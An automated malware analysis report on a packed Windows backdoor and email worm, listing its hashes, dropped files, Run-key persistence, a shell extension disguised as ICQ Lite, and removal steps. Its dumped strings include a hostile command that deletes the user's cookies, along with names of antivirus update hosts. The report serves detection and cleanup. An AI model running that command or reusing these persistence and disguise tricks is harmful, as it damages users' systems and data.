HEUR:Trojan.Win32.Generic (Kaspersky), Packer.Morphine.B (B) (Emsisoft), Packer.Morphine.B (AdAware), Backdoor.Win32.Farfli.FD, GenericEmailWorm.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Backdoor, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8003e1644b2448254cad8671be23fcb6
SHA1: 5e3ed2c90caf3a5c632a4603278814bacdd8e380
SHA256: 0a80910bd7d7807d9d795a85f759748c8d9140b1129c1dc6650131e697b3cddf
SSDeep: 1536:nQKeJ5YQx8k fmTZDZpYuu7Z6BicRw2zvbu/1AQftI3w103CQUI:ngnxsfGDRuljcLmAuI3K
Size: 74241 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: Morphinev27, UPolyXv05_v6
Company: no certificate found
Created at: 1998-09-28 14:39:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1316
The Backdoor injects its code into the following process(es):
mdmi386.exe:1064
svchost.exe:1588
File activity
The process mdmi386.exe:1064 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
The process %original file name%.exe:1316 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\mdmi386.exe (601 bytes)
Registry activity
The process mdmi386.exe:1064 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\DB\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\30\07]
"93" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\6E\05]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\3F\08]
"7A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\60\06]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0B\07]
"E8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\A3\06]
"72" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\B6\08]
"25" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\F0\07]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\79\05]
"55" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\8E\07]
"C0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\AD\08]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\61\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4A\3E\07]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\7B\09]
"28" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\03\09]
"3e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\83\08]
"89" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\77\05]
"F6" = "1"
[HKCR\*\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\AE\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\47\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7B\E0\09]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\55\AD\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\98\06]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\B5\07]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\AA\07]
"E4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\E2\05]
"7E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\18\06]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\D7\08]
"2d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\47\4C\07]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\52\05]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0E\07]
"EC" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\FF\07]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\5B\05]
"70" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5B\C8\08]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4B\DB\07]
"7D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\77\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\44\05]
"13" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\02\06]
"59" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\56\05]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\20\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\14\06]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\58\06]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1D\D0\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7A\22\09]
"67" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\pi]
"1~" = "573571897"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6E\5C\09]
"01" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\DF\06]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B9\5D\0B]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\9A\04]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\F3\06]
"5b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\65\0C]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\34\07]
"ab" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7C\0E\09]
"bc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\BC\07]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\A7\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7E\F5\09]
"aa" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\41\C7\06]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\0F\06]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\E9\07]
"20" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\C9\08]
"00" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\9A\08]
"56" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\94\6C\0A]
"7C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\65\FA\08]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pa]
"~01" = "1#ByR0NRZDEFUHSQhFADoaex9y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\5C\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\57\E1\07]
"80" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\14\07]
"38" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\12\06]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\44\05]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\E2\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\39\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\73\C2\09]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm\C:]
"(Default)" = "153457"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\F4\08]
"43" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\64\90\08]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\0C\04]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\87\06]
"C6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\20\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\B2\08]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\73\06]
"62" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"00" = "pa\~01"
"01" = "pi\1~"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\61\FE\08]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\DD\08]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\6C\05]
"73" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\75\05]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\84\05]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\89\05]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\15\06]
"33" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\55\05]
"85" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"!2" = "1"
"!1" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\BD\06]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\08\07]
"FB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\95\6D\0A]
"0A" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\59\05]
"8D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\90\E0\0A]
"86" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 9B A0 56 59 F6 35 ED A3 63 73 46 7E 34 33 D7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\45\08]
"21" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\E2\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\8C\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\39\38\06]
"44" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{77770022-0D68-4D14-BF25-6747ACFA95DE}" = "Shell Extensions for ICQ Lite"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8E\CC\0A]
"2e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\A7\05]
"0A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\82\06]
"4d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\2A\0C]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\D3\06]
"97" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\71\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc]
"counter" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\55\09]
"0C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\78\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\CE\03]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AC\DA\0B]
"0E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\C0\04]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\D5\05]
"23" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\41\09]
"2b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\7D\07]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\49\08]
"78" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\98\9E\11]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\66\04]
"C1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AB\8B\0B]
"6F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\D8\04]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\50\09]
"27" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\F8\05]
"eb" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\D9\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pi]
"1~" = "1#cFMDSmlYe29vb29vb29vb29vb2tra2tONJI6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\B8\08]
"58" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\50\05]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C1\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\66\A6\08]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\60\05]
"02" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\6E\05]
"91" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\18\C0\04]
"24" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\BE\94\0B]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\0D\A5\0E]
"09" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm]
"pi" = "154537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\CB\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\EE\06]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\32\53\06]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\FD\05]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\29\07]
"86" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\96\35\0A]
"7F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\48\CF\07]
"3d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\85\20\0A]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\BB\05]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\29\05]
"bf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2B\E8\05]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4D\61\07]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8A\4C\0A]
"13" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\F3\06]
"cf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\F5\08]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\6A\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\29\07]
"F8" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"AUHook" = "{BCBCD383-3E06-11D3-91A9-00C04F68105C}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\FB\03]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\89\04]
"E0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\84\7C\0A]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\83\24\09]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\2A\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\A5\06]
"ca" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\67\6C\08]
"EA" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\CE\2D\0C]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\76\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\41\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\A8\54\0B]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\B1\06]
"D5" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\24\06]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\54\06]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C2\06]
"40" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\02\09]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\6B\09]
"46" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\A2\08]
"1d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\45\06]
"af" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\EB\07]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\A2\09]
"0D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\23\04]
"99" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6B\1F\08]
"A8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\1F\06]
"D9" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\19\07]
"77" = "1"
[HKCR\Directory\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\6C\05]
"B8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8B\B6\0A]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\28\E9\05]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\AF\08]
"2a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\21\E7\04]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\46\11\07]
"42" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\34\34\06]
"06" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"(Default)" = "AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6F\4C\09]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B4\4F\0B]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\ED\07]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\AE\08]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\3C\08]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\71\07]
"3b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\52\B6\07]
"cc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\FF\06]
"62" = "1"
[HKCR\CLSID\{BCBCD383-3E06-11D3-91A9-00C04F68105C}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\2C\07]
"de" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\65\06]
"D0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\1C\06]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\84\04]
"D3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\60\8C\08]
"37" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1B\51\03]
"dd" = "1"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe"
The process %original file name%.exe:1316 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 3B 0A 96 A2 DD 6B 03 BB 9B 13 35 7D C6 4B"
Dropped PE files
MD5 | File path |
---|---|
69cd8f35a41fa1a5c99ee49d9a87bede | c:\WINDOWS\system32\AUHook.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1316
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
%System%\mdmi386.exe (601 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe" - Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 229376 | 72192 | 5.54111 | 468df37f266b084a63d51d03dbfac71c |
.idata | 233472 | 4096 | 512 | 0.705801 | 0f0355ba200199275c0ce3814e0ccd62 |
.tls | 237568 | 4096 | 512 | 0.147711 | 3ce56d9e00101a6b28ba1cc0cce53e97 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
Strings from Dumps
mdmi386.exe_1064:
.data
.data
.code
.code
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
update.symantec
update.symantec
liveupdate.symantecliveupdate
liveupdate.symantecliveupdate
secure.nai
secure.nai
sandbox.norman
sandbox.norman
uk.trendmicro-europe
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 403
HTTP/1.1 404
HTTP/1.1 404
wsock32.dll
wsock32.dll
svchost.exe
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
mdmi386.exe
AUHook.dll
AUHook.dll
AUHook.dat
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.text
.idata
.idata
.edata
.edata
.XV^x
.XV^x
.b.Im
.b.Im
advapi32.dll
advapi32.dll
RegOpenKeyA
RegOpenKeyA
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
oleaut32.dll
oleaut32.dll
RASAPI32.dll
RASAPI32.dll
SHLWAPI.DLL
SHLWAPI.DLL
user32.dll
user32.dll
wininet.dll
wininet.dll
